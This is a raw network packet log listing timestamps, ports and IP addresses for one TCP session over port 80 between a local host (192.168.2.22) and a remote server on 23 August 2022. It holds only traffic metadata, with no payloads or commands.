Aug 23, 2022 13:42:48.673093081 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673113108 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673127890 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673198938 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673217058 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673237085 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673249006 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673321962 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673341036 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673361063 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673371077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673393011 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673412085 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673434019 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673445940 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673485994 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673526049 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673546076 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673559904 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673577070 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673599005 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673619986 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673650026 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673683882 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673691034 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673713923 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673717022 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673757076 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673783064 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673804045 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673820972 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673825026 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673836946 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673840046 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673856020 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673867941 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673919916 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673938990 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673955917 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.673959970 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673975945 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.673988104 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.674004078 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.674263000 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731632948 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731678009 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731718063 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731720924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731759071 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731759071 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731764078 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731801033 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731810093 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731843948 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.731862068 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.731900930 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732436895 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732485056 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732491970 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732532978 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732588053 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732630014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732652903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732671022 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732683897 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732714891 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732743025 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732762098 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732789040 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732809067 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732831955 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732872009 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.732877016 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732916117 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.732994080 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733035088 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733043909 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733078957 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733105898 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733146906 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733159065 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733195066 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733205080 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733242035 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733242035 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733285904 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733324051 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733366013 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733386040 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733407974 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733411074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733449936 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733485937 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733602047 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733650923 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733655930 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733700991 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733736038 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733777046 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733791113 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733818054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733819962 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733865023 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733880043 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733918905 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733923912 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733958960 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.733963013 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.733999014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734009027 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734039068 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734047890 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734081030 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734088898 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734121084 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734131098 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734153032 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734172106 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734217882 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734258890 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734267950 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734312057 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734340906 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734383106 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734390020 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734422922 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734430075 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734461069 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734469891 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734513044 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734513044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734561920 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734589100 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734631062 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734642029 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734671116 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734680891 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734709978 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734713078 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734755993 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.734762907 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.734816074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792052984 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792112112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792181969 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792243958 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792290926 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792321920 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792373896 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792429924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792463064 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792522907 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792561054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792622089 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792649984 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792705059 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792732954 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792793036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792820930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792874098 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.792913914 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.792975903 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793009996 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793080091 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793118000 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793179035 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793210030 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793267965 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793299913 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793354988 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793386936 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793448925 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793473005 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793513060 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793543100 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793593884 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793653011 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793689966 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793747902 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793782949 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793839931 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793876886 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.793934107 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.793967009 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794023991 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794059038 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794135094 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794148922 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794205904 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794275999 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794302940 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794364929 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794399977 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794459105 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794492006 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794543982 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794588089 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794641972 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794678926 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794756889 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794771910 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794817924 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794868946 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.794924974 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.794962883 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795015097 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795058966 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795120001 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795152903 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795206070 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795243025 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795305967 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795335054 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795396090 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795408964 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795527935 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795591116 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795627117 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795685053 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795722008 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795777082 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795814037 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795876026 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.795902014 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795980930 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.795995951 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796044111 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796092987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796165943 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796190023 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796220064 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796278000 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796333075 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796371937 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796430111 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796466112 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796520948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796560049 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796586990 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796606064 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796667099 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796720028 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796761036 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796812057 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796854019 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796906948 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.796945095 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.796996117 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797034979 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797086954 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797125101 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797175884 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797188044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797240973 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797293901 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797337055 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797390938 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797426939 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797487974 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797529936 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797590017 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797625065 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797681093 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797719002 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797770023 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797786951 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797841072 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797898054 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.797940016 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.797993898 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798033953 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798086882 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798125982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798178911 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798217058 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798285961 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798325062 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798358917 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798388004 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798444986 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798502922 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798544884 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798604012 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798641920 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798696995 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798734903 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798790932 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798824072 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798882961 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798917055 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.798949003 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.798979998 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799040079 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799093008 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799135923 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799190044 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799227953 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799282074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799320936 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799382925 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799448013 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799515963 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799557924 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799568892 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799601078 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799627066 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799668074 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799681902 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799721003 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799738884 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799776077 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799794912 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799832106 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799849987 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799886942 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799896955 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799916029 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.799956083 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.799974918 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800014019 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800035954 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800079107 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800091982 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800132036 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800148010 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800193071 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800201893 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800236940 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800255060 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800286055 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800298929 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:48.800322056 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:48.800363064 CEST	49171	80	192.168.2.22	141.8.192.151
